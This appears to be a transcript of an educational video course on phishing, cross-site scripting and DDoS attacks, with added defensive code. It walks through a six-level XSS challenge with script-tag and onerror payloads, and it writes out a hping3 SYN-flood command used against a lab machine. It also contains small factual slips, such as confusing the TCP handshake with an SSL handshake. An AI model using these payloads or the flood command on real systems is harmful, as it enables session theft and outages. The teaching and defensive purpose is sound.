Now that we know how phishing attacks work, let's look at ways to prevent ourselves from becoming victims. While the implications of a phishing attack can be extreme, protecting yourself against them is relatively straightforward. Jane could have saved herself from credit card fraud had she checked the link in the email for authenticity and that it redirected to a secure website running on the HTTPS protocol (though note that many phishing sites use HTTPS too, so the padlock alone is not proof of legitimacy; the domain behind the link is what matters). Even suspicious messages shouldn't be entertained, and one must also refrain from entering private information on random websites or pop-up windows, irrespective of how legitimate they seem. It is also recommended to use anti-phishing browser extensions like Cloudphish to sniff out malicious emails from legitimate ones.
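The checks just described (is the link really HTTPS, does the visible text match where the href goes, is the domain a look-alike of the real one) can be automated. The following is an added example, not code from the lecture or from any extension it mentions: it extracts the links from an HTML e-mail body and flags the three tell-tale signs. The sample message, the KNOWN_DOMAINS list and the "last two labels" rule for the registrable domain are constructed simplifications (a real tool would use the public suffix list and a far larger brand list).

```python
"""Flags phishing/pharming signs in the links of an HTML e-mail: a plain
http link, link text that names one site while the href goes to another,
and look-alike domains such as 'facebok.com'.

Added example; the e-mail body, the brand list and the registrable-domain
heuristic are constructed for this demonstration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed: the domains this user legitimately expects mail from.
KNOWN_DOMAINS = ["facebook.com", "youtube.com", "mybank.com"]


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs from <a> elements."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host: str) -> str:
    """Last two labels of the host (simplification: no public-suffix list)."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot one- or two-letter typo-squats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_link(href: str, text: str) -> list:
    """Return the warnings raised for one link (empty list = looks fine)."""
    warnings = []
    url = urlparse(href)
    host = (url.hostname or "").lower()
    domain = registrable_domain(host)
    if url.scheme != "https":
        warnings.append("insecure-scheme")
    # Link text that itself looks like a URL or host must match the href.
    text_host = urlparse(text if "://" in text else "//" + text).hostname
    if text_host and "." in text_host and registrable_domain(text_host) != domain:
        warnings.append("text-host-mismatch")
    for known in KNOWN_DOMAINS:
        if domain == known:
            continue
        if 0 < edit_distance(domain, known) <= 2:
            warnings.append(f"lookalike:{known}")
        elif known in host:          # brand buried inside someone else's domain
            warnings.append(f"brand-in-host:{known}")
    return warnings


def check_email(html_body: str) -> dict:
    """Map each href in the e-mail to its list of warnings."""
    parser = LinkCollector()
    parser.feed(html_body)
    return {href: check_link(href, text) for href, text in parser.links}


# Constructed sample message modelled on the scenario in the text.
SAMPLE_EMAIL = """
<p>Dear customer, please update your credit card PIN within 24 hours.</p>
<a href="http://facebok.com/secure">https://www.facebook.com/secure</a><br>
<a href="https://www.facebook.com/help">Help centre</a><br>
<a href="https://login.mybank.com.verify-account.net/pin">mybank.com</a>
"""

if __name__ == "__main__":
    for href, flags in check_email(SAMPLE_EMAIL).items():
        print(href, "->", flags or "ok")
```

The first link in the sample is caught three ways at once (plain http, text says facebook.com while the href says facebok.com, and facebok.com is one edit away from a known brand); the third is HTTPS and contains "mybank.com", yet the registrable domain is verify-account.net, which is the case the padlock check alone would miss.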
The best way to prevent phishing is browsing the internet with care and being on alert for malicious attempts at all times.

Let's start by learning about cross-site scripting from a layman's perspective. Cross-site scripting, also known as XSS, is a type of code injection attack that occurs on the client side. The attacker intends to run harmful scripts in the victim's web browser by embedding malicious code in a genuine web page or web application. The real attack takes place when the victim visits the web page or application infected with the malicious code; the web page or application serves as a vehicle for the malicious script to be sent to the user's browser. Forums, message boards and web pages that enable comments are vulnerable vehicles frequently used for cross-site scripting attacks. A web page or web application is vulnerable to XSS if the output it creates contains unsanitized user input, which the victim's browser must then parse. In VBScript, ActiveX, Flash and even CSS, cross-site scripting attacks are conceivable; they are nevertheless most ubiquitous in JavaScript, because JavaScript is central to most browser experiences nowadays.

The main purpose of this attack is to steal another user's identity, be it via cookies, session tokens or other information. In most cases this attack is used to steal the other person's cookies: as we know, cookies let us log in automatically, so with stolen cookies we can log in as another identity, and this is one of the reasons this attack is considered one of the riskiest. It can be performed with different client-side programming languages as well. Cross-site scripting is often compared with similar client-side attacks, as client-side languages are mostly what is used, but an XSS attack is considered riskier because of its ability to damage even less vulnerable technologies. Most often this attack is performed with JavaScript and HTML.

JavaScript is a programming language that runs on web pages inside your browser. The client-side code adds functionality and interactivity to the web page and is used extensively on all major applications and CMS platforms. Unlike server-side languages such as PHP, JavaScript code runs inside your browser and cannot directly change the website for other visitors; it is sandboxed to your own browser and can only perform actions within your own browser window. While JavaScript is client-side and does not run on the server, it can be used to interact with the server by performing background requests. Attackers can use these background requests to add unwanted spam content to a web page without refreshing it, gather analytics about the client's browser, or perform actions asynchronously.

The manner of attack can vary: it can be a single link the user must click to initiate a piece of JavaScript code, or it can show images that are later used as a front for malicious code being installed as malware. With the majority of internet users unaware of how metadata works or how web requests are made, the chances of victims clicking on a redirecting link are far too high. Cross-site scripting can occur via a malicious script executed on the client side using a fake page, or even a form displayed to the user on websites carrying advertisements; malicious emails can also be sent to the victim. These attacks occur when the malicious user finds the vulnerable parts of the website and sends them appropriately crafted malicious input.

Now that we understand the basics of cross-site scripting, let us learn how this kind of attack works. In the first place we have the website or web browser, which is used to show content to the user, the victim in our case. Whenever the user wants content from the website, the website asks the server for the data; the server provides this information to the website and the web browser, which ultimately reaches the victim. Where does the hacker come into play? He passes certain arguments to the web browser which can then be forwarded back to the server or to the user at hand. The entire cross-site scripting attack vector comes down to sending and injecting malicious code or script. This can be performed in different ways depending on the type of attack: the malicious script may be reflected in the victim's browser, or stored in the database and executed every time the user calls the appropriate function. The main reason for this attack is inappropriate validation of user input, where malicious input can get into the output. A malicious user can enter a script which is injected into the website's code, and the browser is not able to tell whether the executed code is malicious or not; therefore this malicious script is executed in the victim's browser, or in any fake form that is displayed to users. There are many ways to trigger an XSS attack; for example, execution could be triggered automatically when the page loads or when a user hovers over specific elements of the page, like hyperlinks.

Potential consequences of cross-site scripting attacks include capturing a user's keystrokes, redirecting a user to malicious websites, running browser-based exploits, obtaining the cookie information of a user who is logged into a website, and many more. In some cases a cross-site scripting attack leads to complete compromise of the victim's account: attackers can trick users into entering credentials on a fake form, which then provides all the information to the attacker.

With the basic working of a cross-site scripting attack out of the way, let us go over the different ways hackers can leverage vulnerable web applications to gather information and eventually breach those systems. The prime purpose of performing an XSS attack is to steal the other person's identity, as mentioned: cookies, session tokens and so on. XSS may also be used to display fake pages or forms to the victim. This can be performed in several ways.

First we have a reflected attack. This occurs when a malicious script is not saved on the web server but is reflected in the website's response. Reflected XSS code is not saved permanently; the malicious code is reflected in some website result. The attack code can be included in a fake URL or in HTTP parameters, and it can affect the victim in different ways, by displaying a fake malicious page or by sending a malicious email. In a reflected cross-site scripting example, the input of a search form is reflected on the page to show what the search key was. An attacker may craft a URL that contains malicious code and then spread that URL via email or social media. A user who clicks on the link opens the valid web application, which then runs the malicious code in the browser. The script is not stored in the web application, and the malicious code is shown only to the one user who opens the link and executes the script; the attack is not necessarily visible on the server side or to the app owner.

The next variant is a stored cross-site scripting attack. This occurs when a malicious script is saved on the web server permanently, and it can be considered a riskier attack since it has leverage for more damage. In this type of attack the malicious code or script is saved on the server, for example in the database or the website, and executed every time users call the appropriate functionality; this way a stored XSS attack can affect many users, and as the script is stored on the web server it affects the website for a longer time. To perform a stored XSS attack, the malicious script is sent through a vulnerable input form, for example a comment field or review field; the script is saved in the database and evaluated on page load or when the appropriate function is called. In a stored XSS example, the script might have been submitted via an input field to the web server, which did not perform sufficient validation and stored the script permanently in the database. The consequence is that the script is delivered to all users visiting the web application, and it may for example be able to gain access to the users' session cookies. In this attack the script is permanently stored in the web app; users visiting the app after the injection retrieve the script, and the malicious code then exploits the flaws in the web application.
The script and the attack are visible on the server side or to the app owner as well.

The third variant is DOM-based cross-site scripting. This type of attack occurs when the DOM environment is changed but the client-side code does not change; when the DOM environment is modified in the victim's browser, the client-side code executes differently. To get a better understanding of how a DOM XSS attack is performed, consider the following example: if there is a website called textin.com and we know default is a parameter, then to perform a DOM XSS attack we send a script as the parameter. A DOM-based XSS attack may be successfully executed even when the server does not embed any malicious code into the web page, by using a flaw in the JavaScript executed in the browser. For example, if the client-side JavaScript modifies the DOM tree of the web page based on an input field or a GET parameter without validating the input, this allows the malicious code to be executed. The malicious code exploits flaws in the browser on the user's side, and the script and the attack are not necessarily visible on the server side or to the app owner.

By now it is clear that cross-site scripting attacks are difficult to detect and even tougher to fight against. There are, however, plenty of ways one can safeguard against such attacks; let's go through some of these preventive measures. As mentioned earlier, XSS attacks are sometimes difficult to detect, but this can change if you get some external help. One way to prevent XSS attacks is using automated testing tools like the Crashtest Security Suite or the Acunetix security suite. Manual testing is highly time-consuming and costly, and therefore not possible for every iteration of your web application; consequently your code shouldn't go untested before any release. Using automated security testing you can scan your web application for cross-site scripting and other critical vulnerabilities before every release, and this way you can ensure that your web application's latest version is still secure whenever you alter or add a feature.

Input fields are the most common point of entry for an XSS attack script, therefore you should always screen and validate any information input into data fields. This is particularly important if the data will be included as HTML output, and it can be used to protect against reflected XSS attacks. Validation should occur on both the client side and the server side as an added precaution; this helps validate the data before it is sent to the server and can also protect against persistent XSS scripts. On the client side this can be accomplished using JavaScript, but the server-side check is the one that cannot be bypassed, since an attacker can send requests without ever running your client-side code.

XSS attacks only appear if user input is displayed on the web page, therefore try to avoid displaying any untrusted user input if possible. If you need to display user data, restrict the places where the user input might appear: any input displayed inside a JavaScript tag or a URL shown on the site is much more likely to be exploited than input that appears inside a div or span element in the HTML body. Protecting against XSS vulnerabilities typically requires properly escaping user-provided data that is placed on the page. Rather than trying to determine if the data is user-provided and could be compromised, we should always play it safe and escape data whether it is user-provided or not. Unfortunately, because there are many different rules for escaping, you still must choose the proper type of escaping before settling on final code. Encoding should be applied directly before user-controllable data is written to a page, because the context you are writing into determines what kind of encoding you need to use; for example, values inside a JavaScript string require a different type of escaping to those in an HTML context. Sometimes you'll need to apply multiple layers of encoding in the correct order: to safely embed user input inside an event handler, you need to deal with both the JavaScript context and the HTML context, so you first Unicode-escape the input for JavaScript and then HTML-encode the result.

Content Security Policy, or CSP, is a computer security standard introduced to prevent cross-site scripting, clickjacking and other code injection attacks resulting from the execution of malicious content in the trusted web page context. It is a Candidate Recommendation of the W3C Web Application Security Working Group, it is widely supported by modern web browsers, and it provides a standard method for website owners to declare the approved origins of content that browsers should be allowed to load on their website.

HttpOnly is an additional flag included in a Set-Cookie HTTP response header. Using the HttpOnly flag when generating a cookie helps mitigate the risk of client-side script accessing the protected cookie, if the browser supports it. If the HttpOnly flag is included in the HTTP response header, the cookie cannot be accessed through a client-side script. As a result, even if a cross-site scripting flaw exists and a user accidentally accesses a link that exploits it, the browser will not reveal the cookie to a third party. If a browser does not support HttpOnly and a website attempts to set an HttpOnly cookie, the flag is ignored by the browser, creating a traditional script-accessible cookie, and the cookie becomes vulnerable to theft or modification by any malicious script. Note that HttpOnly protects the cookie value, not the session: a script running in the victim's browser can still make requests that carry the cookie, so it limits the damage of XSS rather than removing it.

Next on our docket is a live demonstration where we solve a set of cross-site scripting problems, starting from the basic level and going up to the topmost level, six. We're going to start at level one. This web application demonstrates a common cause of cross-site scripting, where user input is directly included in the page without proper escaping. If we interact with the vulnerable application window here and find a way to make it execute JavaScript of our choosing, we can take actions inside the vulnerable window or directly edit its URL bar. This task needs only basic knowledge; let's see why the most primitive injections work here right away. Let's do a simple query and inspect the resulting HTML page. I'm going to use this phrase with a single quote as a special character. We can now inspect the HTML page, and we can see in this line that the special character, the single quote, appears in the result: the provided query text is placed directly inside a b tag in the body element. We need to perform a reflected XSS on the web application, and because these are non-persistent XSS attacks the payload should be included in the URL for successful exploitation. We can use any payload, but we're going to use a simple one that performs an alert in this web application; it's simple and can be shown easily. I'm going to write the script here and press search, and as you can see we have successfully launched our first cross-site scripting attack: an alert box pops up with the message. A similar process can be used to steal browser cookies and passwords, albeit with different commands.

Now we have the option to move to level two. This web application shows how easily XSS bugs can be introduced in complex chat applications. Chat app conversations are stored in a database and retrieved when a user wants to see the conversation, therefore if a malicious user injects some JavaScript code, all visitors will be infected. This kind of cross-site scripting attack is more powerful and riskier than reflected cross-site scripting, and that's why it is known as stored XSS. I posted my query with the special character, a single quote, and this is what I get: whatever I typed simply appeared on the page right after I clicked share status. Let's see the source. You can see here that the text I posted is put directly inside a blockquote tag, so even the simple script tag we used in level one should work here, but it will not. Let us examine the code to understand why. We're going to toggle the code here and check the index.html file; the important part is line 32. The generated HTML fragment, which is the html variable in the code, is added to the main HTML using the innerHTML property, and when the browser parses an HTML fragment inserted via innerHTML it does not execute any script tag defined within that fragment. This is why the script tag we used in level one is not going to work here. Our solution is to use events: event handlers will execute the JavaScript we define. We're going to use an image here, and when we press share status, the injection loads an image that doesn't exist, which triggers an onerror event, and in the onerror handler it executes our alert method. With that we have beaten level two and can move up to the next level in our challenge.

At level three, as you can see, clicking on any tab causes the tab number to be displayed in the URL fragment. This hints that the value after the hash controls the behavior of the page, that is, it is an input variable. To confirm, let's analyze the code. As you can see in line 43, inside the event handling, the value provided after the hash in the URL is passed directly to the chooseTab method; no input validation is performed. The value passed to the chooseTab method is injected directly into the img tag in line 17. This is an unsafe assignment and it is the vulnerable part of the code. All we have to do now is craft a payload that adjusts the img tag to execute our JavaScript. Remember, the script tag from level one would not work here, since the html variable is used to add to the DOM dynamically via innerHTML; hence event handlers are again the way in. Once more I choose to use the existing img tag and change the source to something that doesn't exist, forcing it to fall into an onerror event, which I pass in the URL. Once we visit that URL, the JavaScript pop-up opens with the message that XSS level 3 has been completed.
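The encoding rules laid out earlier (escape for the HTML context, escape differently for a JavaScript string, and layer the two in the right order for an event handler) and the sinks exploited in levels one to three can be shown side by side. The following is an added example, not the page's or the challenge's own code: each render_* function pairs the vulnerable string assembly with a hardened version, and the three payloads are constructed to match the levels. The assembly is done in Python here, but the rule is the same when browser JavaScript builds the fragment and assigns it with innerHTML, which is why the fragment case uses an allow-list rather than encoding.

```python
"""Context-aware output encoding for the sinks discussed above (HTML body,
event-handler attribute holding a JavaScript string) plus allow-list
validation for a URL-fragment value that selects an image.

This is an added example, not the page's or the challenge's code. The
render_* functions and the payloads are constructed; the string assembly
is done in Python here, but the rule is the same when browser JavaScript
assembles the fragment and assigns it with innerHTML.
"""
import html
import json
import re


def encode_html(value: str) -> str:
    """For data placed between tags or inside a quoted attribute:
    & < > " ' are all replaced, so the attacker can neither open a new
    tag nor close the attribute to add onerror=..."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """For data placed inside a JavaScript string literal: JSON quoting,
    with < > & escaped as \\uXXXX so '</script>' cannot end the block."""
    return (json.dumps(value)
            .replace("<", "\\u003c").replace(">", "\\u003e")
            .replace("&", "\\u0026"))


# --- level 1 pattern: search term reflected in the HTML body --------------
def render_search_vulnerable(term: str) -> str:
    return "<b>" + term + "</b>"            # raw reflection


def render_search_safe(term: str) -> str:
    return "<b>" + encode_html(term) + "</b>"


# --- level 3 pattern: URL fragment becomes an img src via innerHTML -------
def render_tab_vulnerable(tab: str) -> str:
    return "<img src='/static/level3/" + tab + ".jpg'>"


def render_tab_safe(tab: str) -> str:
    # Allow-list: the fragment may only name one of the three known tabs.
    # Validation beats encoding here because a file name is not free text.
    if not re.fullmatch(r"[1-3]", tab):
        tab = "1"
    return "<img src='/static/level3/" + tab + ".jpg'>"


# --- level 4 pattern: value inside an onload handler's JS string ----------
def render_timer_vulnerable(seconds: str) -> str:
    return "<body onload=\"startTimer('" + seconds + "')\">"


def render_timer_safe(seconds: str) -> str:
    # Two contexts, innermost first: JS-string-encode, then HTML-encode the
    # result because the handler lives in an HTML attribute. The browser
    # undoes the HTML layer first, leaving a single JS string literal.
    return '<body onload="startTimer(' + encode_html(encode_js_string(seconds)) + ')">'


# Constructed payloads mirroring the demo levels.
SEARCH_PAYLOAD = "<script>alert('XSS level 1')</script>"
TAB_PAYLOAD = "1' onerror='alert(\"XSS level 3\")"
TIMER_PAYLOAD = "3'); alert('XSS level 4'); ('"

if __name__ == "__main__":
    for label, vuln, safe, payload in [
        ("search", render_search_vulnerable, render_search_safe, SEARCH_PAYLOAD),
        ("tab", render_tab_vulnerable, render_tab_safe, TAB_PAYLOAD),
        ("timer", render_timer_vulnerable, render_timer_safe, TIMER_PAYLOAD),
    ]:
        print(f"{label} vulnerable: {vuln(payload)}")
        print(f"{label} safe:       {safe(payload)}")
```

Running it prints, for each level, the fragment an attacker would get the browser to parse beside the hardened output: the script tag becomes inert text, the tab payload collapses to tab 1, and the timer value ends up as one quoted JavaScript string no matter what it contains. The order in the timer case matters: HTML-encoding first and then JS-encoding would leave the attribute's quote character unescaped when the browser strips the HTML layer.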
with the same message of XSS level 3 has been completed with this we can now move on to level four which is going to present a different kind of attack in this web application there is a timer on the page that means whatever numbers we put in the box a countdown starts and then when it finishes the application alerts that the countdown is finished and you can see the timer is a pop-up appearing over here and this resets the timer again now it is obvious that the value entered in the text box is transferred to the server over the timer parameter in the URL let us examine the code to see how the timer parameter is being handled we’re going to visit timer.html over here and we’re going to check over here in line 21 the start timer method is being called in the onload event however the timer parameter is being directly passed to the start timer method we need to perform a pop-up alert in the web application which escapes the content of the function start timer without baking the JavaScript code the parameter value is directly added to the start timer method without any filtering what we can try to do here is to inject an alert function to be executed inside the onload event along with the start timer method we’re going to remove this argument and put our script over here now when we press on create timer and we have a pop-up with the excss level four completed we can now move on to level five in this web application the application excss is different because this challenge description says cross-ite scripting isn’t just about correctly escaping data sometimes attackers can do bad things even without injecting new elements into the DOM it’s kind of open redirect cuz the attack payload is executed as a result of modifying the DOM environment in the victim’s browser this environment is used by the original client side script so that the client side code runs in an unexpected manner the vulnerability can be easily detected if the next link in the signup page is inspected 
The href attribute value of the next link is "confirm", which is exactly the value of the next URL query parameter, as you can see over here. This means the next query parameter can be used to inject JavaScript code into the href attribute of the next link. The following is the best way to do it: as soon as the user clicks on the link the script will be triggered. We're going to enter anything random, and now that we click next we can see the "XSS level five" that we had provided in the URL as a parameter to the next variable. Since the value of next provided appears in a pop-up, we can consider the attack a success and move on to the final level, six.

In this web application it shows that some external JavaScript is retrieved. If you analyze the URL you can see that the script is loaded already. The vulnerability lies within how the code handles the value after the hashtag. If you check line 45, the value right after the hashtag is taken as the gadget name, and then in line 48 the value is directly passed on to the includeGadget method. In the includeGadget method, which we can see over here, you can see in line 18 a script tag is created, and the URL gadget name parameter value is directly used as the source attribute of the script tag in line 28. This means we can completely control the source attribute of the script tag that is being created; that is, with this vulnerability we can inject our own JavaScript file into the code. We can inject a URL of our own hosted JavaScript into the web application's URL after the hashtag, and the URL should not be using HTTPS but something like it, to bypass the regular expression used for the security check. We're going to remove the pre-stored URL and load our own JavaScript file. Finally we have reached the end of our challenge: we completed six different varieties of cross-site scripting attacks and used different solutions for all six questions.

With work from home being the norm in today's era, people spend a considerable amount of time on the
internet, often without specific measures to ensure a secure session. Apart from individuals, organizations worldwide that host data and conduct business over the internet are always at risk of a DDoS attack. These DDoS attacks are getting more extreme, with hackers getting easy access. As the graph shows, three of the six strongest DDoS attacks were launched in 2021, with the most extreme attack occurring just last year, in 2020. Lately cyber criminals have been actively seeking out new services and protocols for amplifying these DDoS attacks. Active involvement with hacked machines and botnets allows further penetration into the consumer space, allowing much more elaborate attack campaigns. Apart from general users, multinational corporations have also had their fair share of problems. GitHub, a platform for software developers, was the target of a DDoS attack in 2018, widely suspected to be conducted by Chinese authorities. This attack went on for about 20 minutes, after which the systems were brought into a stable condition. It was the strongest DDoS attack to date at the time and made a lot of companies reconsider their security practices to combat such attacks. Even after years of experimentation, DDoS attacks are still at large and can affect anyone in the consumer and corporate space.

Hey everyone, this is Baivab from SimplyLearn, and welcome to this video on what is a DDoS attack. Let's learn more about what a DDoS attack is. A distributed denial of service attack, or DDoS, is when an attacker or attackers attempt to make it impossible for a service to be delivered. This can be achieved by thwarting access to virtually anything: servers, devices, services, networks, applications, and even specific transactions within applications. In a DoS attack it's one system that is sending the malicious data or requests; a DDoS attack comes from multiple systems. Generally these attacks work by drowning a system with requests for data. This could be sending a web server so many requests to serve a page that it crashes under the demand, or it could be a database being hit with a high volume of queries. The result is that available internet bandwidth, CPU and RAM capacity become overwhelmed. The impact could range from a minor annoyance from disrupted services to entire websites, applications, or even entire businesses being taken offline. More often than not these attacks are launched using machines in a botnet. A botnet is a network of devices that can be triggered to send requests from a remote source, often known as the command and control center. The bots in the network attack a particular target, thereby hiding the original perpetrator of the DDoS campaign. But how do these devices come under a botnet, and what are the requests being made to the web servers? Let's learn more about these and how the attack works.

A DDoS attack is a two-phase process. In the first phase a hacker creates a botnet of devices. Simply put, a vast network of computers is hacked via malware, ransomware, or just simple social engineering. These devices become a part of the botnet, which can be triggered at any time to start bombarding a system or a server on the instruction of the hacker that created the botnet. The devices in these networks are called bots or zombies. In the second phase a particular target is selected for the attack. When the hacker finds the right time to attack, all the zombies in the botnet network send these requests to the target, thereby taking up all the server's available bandwidth. These can be simple ping requests or complex attacks like SYN flooding and UDP flooding. The aim is to overwhelm them with more traffic than the server or the network can accommodate; the goal is to render the website or service inoperable.

There is a lot of wiggle room when it comes to the type of DDoS attack a hacker can go with. Depending on the target's vulnerability, we can choose one of three broad categories of DDoS attacks. Volume-based attacks use massive amounts of bogus traffic to overwhelm a resource; it can be a website or a server. They include ICMP, UDP, and spoofed-packet flood attacks. The size of a volume-based attack is measured in bits per second. These attacks focus on clogging all the available bandwidth for the server, thereby cutting the supply short. Several requests are sent to the server, all of which warrant a reply, thereby not allowing the target to cater to the general legitimate users. Next we have the protocol-level attacks. These attacks are meant to consume essential resources of the target server. They exhaust the load balancers and firewalls which are meant to protect the system against DDoS attacks. These protocol attacks include SYN floods and Smurf DDoS, among others, and their size is measured in packets per second. For example, in an SSL handshake the server replies to the hello message sent by the hacker, which will be the client in this case; but since the IP is spoofed and leads nowhere, the server gets stuck in an endless loop of sending the acknowledgement without any end in sight. Finally we have the application-level attacks. Application layer attacks are conducted by flooding applications with maliciously crafted requests. The size of application layer attacks is measured in requests per second. These are relatively sophisticated attacks that target application and operating system level vulnerabilities. They prevent the specific applications from delivering necessary information to users and hog the network bandwidth up to the point of a system crash. Examples of such an attack are HTTP flooding and BGP hijacking. A single device can request data from a server using HTTP POST or GET without any issues; however, when the requisite botnet is instructed to bombard the server with thousands of requests, the database bandwidth gets jammed and it eventually becomes unresponsive and unusable.

But what about the reasons for such an attack? There are multiple lines of thought as to why a hacker decides to launch a DDoS attack on unsuspecting targets. Let's take a look at a few of them. The first option is to gain a competitive advantage. Many DDoS attacks are conducted by hacking communities against rival groups. Some organizations hire such communities to stagger their rivals' resources at a network level to gain an advantage in the playing field. Since being a victim of a DDoS attack indicates a lack of security, the reputation of such a company takes a significant hit, allowing the rivals to cover some ground. Secondly, some hackers launch these DDoS attacks to hold multinational corporations to ransom. The resources are jammed, and the only way to clear the way is if the target company agrees to pay a designated amount of money to the hackers. Even a few minutes of inactivity is detrimental to a company's reputation in the global market, and it can cause a spiral effect both in terms of market value and product security index. Most of the time a compromise is reached and the resources are freed after a while. DDoS attacks have also found use in the political segment. Certain activists tend to use DDoS attacks to voice their opinion; spreading the word online is much faster than any local rally or forum. Primarily political, these attacks also focus on online communities, ethical dilemmas, or even protests against corporations.

Let's take a look at a few ways that companies and individuals can protect themselves against DDoS attacks. The company can employ load balancers and firewalls to help protect the data from such attacks. Load balancers reroute the traffic from one server to another in a DDoS attack; this reduces the single point of failure and adds resiliency to the server data. A firewall blocks unwanted traffic into a system and manages the number of requests made at a definite rate. It checks for multiple attacks from a single IP and occasional slowdowns to detect a DDoS attack in action. Early detection of a DDoS attack goes a long way in recovering the data lost in such an event. Once you've detected the attack, you will have to find a way to respond. For example, you will have to work on dropping the malicious DDoS traffic before it reaches your server so that it doesn't throttle and exhaust your bandwidth. Here's where you will filter the traffic so that only legitimate traffic reaches the server. By intelligent routing you can break the remaining traffic into manageable chunks that can be handled by your cluster resources. The most important stage in DDoS mitigation is where you will look for patterns of DDoS attacks and use those to analyze and strengthen your mitigation techniques; for example, blocking an IP that's repeatedly found to be offending is a first step. Cloud providers like Amazon Web Services and Microsoft Azure, who offer high levels of cyber security including firewalls and threat monitoring software, can help protect your assets and network from DDoS criminals. The cloud also has greater bandwidth than most private networks, so it is unlikely to fail under the pressure of increased DDoS attacks. Additionally, reputable cloud providers offer network redundancy, duplicating copies of your data, systems and equipment so that if your service becomes corrupted or unavailable due to a DDoS attack you can switch to secure access on backed-up versions without missing a beat. One can also increase the amount of bandwidth available to a host server being targeted. Since DDoS attacks fundamentally operate on the principle of overwhelming systems with heavy traffic, simply provisioning extra bandwidth to handle unexpected traffic spikes can provide a measure of protection. This solution can prove expensive, as a lot of that bandwidth is going to go unused most of the time. A content delivery network, or CDN, distributes your content and boosts performance by minimizing the distance between your resources and end users. It stores cached versions of your content in multiple locations, and this eventually mitigates DDoS attacks by avoiding a single point of failure when the attacker is trying to focus on a single target. Popular CDNs
include Akamai CDN, Cloudflare, AWS CloudFront, etc.

Let's start with a demo regarding the effects of DDoS attacks on a system. For the demo we have a single device that will attack a target, making it a DoS attack of sorts; once a botnet is ready, multiple devices can do the same and eventually emulate a DDoS attack. To do so we will use the virtualization software called VMware with an instance of the Parrot Security operating system running. For a target machine we will be running another VMware instance of a standard Linux distribution known as Linux Lite. In the target device we can use Wireshark to determine when the attack begins and see the effects of the attack accordingly. This is Linux Lite, which is our target machine, and this is Parrot Security, which is used by the hacker when trying to launch a DDoS attack; this is just one of the distros that can be used to launch the attack. We must first find the IP address of our target. To find the IP address we open the terminal and use the command ifconfig, and here we can find the IP address. Now remember, we're launching this attack in VMware; both the instances of Parrot Security and Linux Lite are being run on my local network, so the address that you can see here is 192.168.72.129, which is a private address. This IP cannot be accessed from outside the network, basically by anyone who is not connected to my Wi-Fi. When launching attacks with public servers or public addresses, it will have a public IP address that does not belong to the 192.168 subnet. Once we have the IP address we can use a tool called hping3. hping3 is an open-source packet generator and analyzer for the TCP/IP protocol. To check what the effects of an attack are we will be using Wireshark. Wireshark is a network traffic analyzer; we can see whatever traffic is passing through the Linux Lite distro being displayed over here, with the source IP and the destination IP as to where the request is being transferred to. Once we have the DoS attack launched you can see the results coming over here from the source IP, which will be Parrot Security. Now, to launch the hping3 command we need to give sudo access to the console, which is root access. Now we have root access for the console. The hping3 command will have a few arguments to go with it, which are, as you can see on the screen, -S, --flood, -V, -p 80, and the IP address of the target, which is 192.168.72.129. In this command we have a few arguments, such as the -S, which specifies SYN packets; like in an SSL handshake, we have the SYN request that the client sends to the server to initiate a connection. The --flood aims to ignore the replies that the server will send back to the client in response to the SYN packets; here the Parrot Security OS is the client and Linux Lite is the server. -V stands for verbosity, as in we will see some output when the requests are being sent. The -p 80 stands for port 80; we can replace the port number if we want to attack a different port. And finally we have the IP address of our target. As of right now, if we check Wireshark it is relatively clear and there is no indication of a DoS attack incoming. Now once we launch the attack, over here we can see the requests coming in from this IP, which is 192.168.72.128. Till now even the network is responsive, and so is Linux Lite. The requests keep on coming, and we can see the HTTP flooding has started in flood mode. After a few seconds of this attack continuing, the server will start shutting down. Now remember, Linux Lite is a distro, and such Linux distros serve as the backend to many servers across the world. For example, a few seconds have passed from the attack, and now the system has become completely unresponsive. This has happened due to the huge number of requests that came from Parrot Security. You can see whatever I press, nothing responds; even Wireshark has stopped capturing new requests, because the CPU usage right now is completely 100%. At this point in time anyone who is trying to request some information from this Linux distro, or wherever this Linux distro is being used as a backend for a server or a database, cannot access anything else. The system has completely stopped responding, and any legitimate request from legitimate users will be dropped. Once we stop the attack over here, it takes a bit of time to settle down; now remember, it's still out of control, but eventually the traffic dies down and the system regains its strength. It is relatively easy to gauge right now the effect of a DoS attack. Now remember, this Linux Lite is just a VM instance; actual website servers and web databases have much more bandwidth and are very secure, and it is tough to break into them. That is why we cannot use a single machine to break into them; that is where a DDoS attack comes into play. What we did right now is a DoS attack, as in a single system is being used to penetrate a target server using a single request. Now in a DDoS attack, multiple systems, such as multiple Parrot Security instances or multiple zombies or bots in a botnet network, can attack a target server to completely shut down the machine and drop any legitimate requests, thereby rendering the service and the target completely unusable and inoperable. As a final note, we would like to remind you that this is for educational purposes only, and we do not endorse any attacks on any domains; only test this on servers and networks that you have permission to test on.

Cyber security has become one of the most rigid industries in the last decade, while simultaneously being the most challenged. With every aspect of corporate culture going online and embracing cloud computing, there is a plethora of critical data circulating through the internet, all worth billions of dollars to the right person. Increasing benefits require more complex attacks, and one of these attacks is the brute force attack.
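On the defending side, the flood in the demo above shows up in Wireshark as a burst of SYNs from one source that are never followed by a completing ACK, which is the pattern a firewall or IDS keys on before dropping the offender, as the mitigation section earlier describes. The detector below is an added example rather than the video's code; it runs over constructed packet records that mimic that capture, and the addresses, thresholds and timings are assumptions.

```javascript
// Added example, not from the video: a small SYN-flood detector run over
// constructed packet records shaped like what Wireshark showed in the demo
// (one source sending nothing but SYNs to the target). All addresses,
// timings and thresholds are constructed.

const TARGET = '192.168.72.129'; // the demo's target address

// Each record mirrors Wireshark's columns: time in seconds, source,
// destination and TCP flags ("S" SYN, "SA" SYN/ACK, "A" ACK).
function buildSamplePackets() {
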